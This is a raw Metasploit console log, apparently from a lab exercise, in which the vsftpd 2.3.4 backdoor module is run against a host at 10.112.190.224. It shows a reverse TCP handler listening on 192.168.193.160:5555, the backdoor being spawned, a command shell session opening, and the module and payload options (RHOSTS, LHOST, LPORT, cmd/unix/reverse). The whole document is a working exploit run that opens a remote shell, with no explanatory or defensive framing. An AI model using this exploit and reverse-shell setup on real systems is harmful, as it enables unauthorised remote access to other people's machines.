msf exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] Started reverse TCP double handler on 192.168.193.160:5555
[*] 10.112.190.224:21 - Running automatic check ("set AutoCheck false" to disable)
[*] 10.112.190.224:21 - FTP banner hints its vulnerable: 220 (vsFTPd 2.3.4)
[+] 10.112.190.224:21 - The target appears to be vulnerable. vsftpd 2.3.4 banner detected; backdoor may be present
[+] 10.112.190.224:21 - Backdoor has been spawned!
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo Rtl3Tb5mUu9Vk9W2;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "Rtl3Tb5mUu9Vk9W2\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 5 opened (192.168.193.160:5555 -> 10.112.190.224:49360) at 2026-05-24 21:08:08 +0300
[*] 10.112.190.224 - Command shell session 5 closed.
msf exploit(unix/ftp/vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.112.190.224 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.193.160 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux/Unix Command
View the full module info with the info, or info -d command.
msf exploit(unix/ftp/vsftpd_234_backdoor) >